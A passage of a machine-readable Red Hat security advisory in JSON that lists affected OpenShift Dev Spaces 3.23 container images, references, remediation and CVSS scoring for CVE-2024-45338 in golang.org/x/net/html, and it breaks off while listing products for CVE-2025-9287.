          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2024-45338"
        },
        {
          "category": "external",
          "summary": "RHBZ#2333122",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2333122"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45338",
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45338",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45338"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/637536",
          "url": "https://go.dev/cl/637536"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/70906",
          "url": "https://go.dev/issue/70906"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/wSCRmFnNmPA/m/Lvcd0mRMAwAJ",
          "url": "https://groups.google.com/g/golang-announce/c/wSCRmFnNmPA/m/Lvcd0mRMAwAJ"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2024-3333",
          "url": "https://pkg.go.dev/vuln/GO-2024-3333"
        }
      ],
      "release_date": "2024-12-18T20:38:22.660000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "golang.org/x/net/html: Non-linear parsing of case-insensitive content in golang.org/x/net/html"
    },
    {
      "cve": "CVE-2025-9287",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "discovery_date": "2025-08-20T22:00:53.821394+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
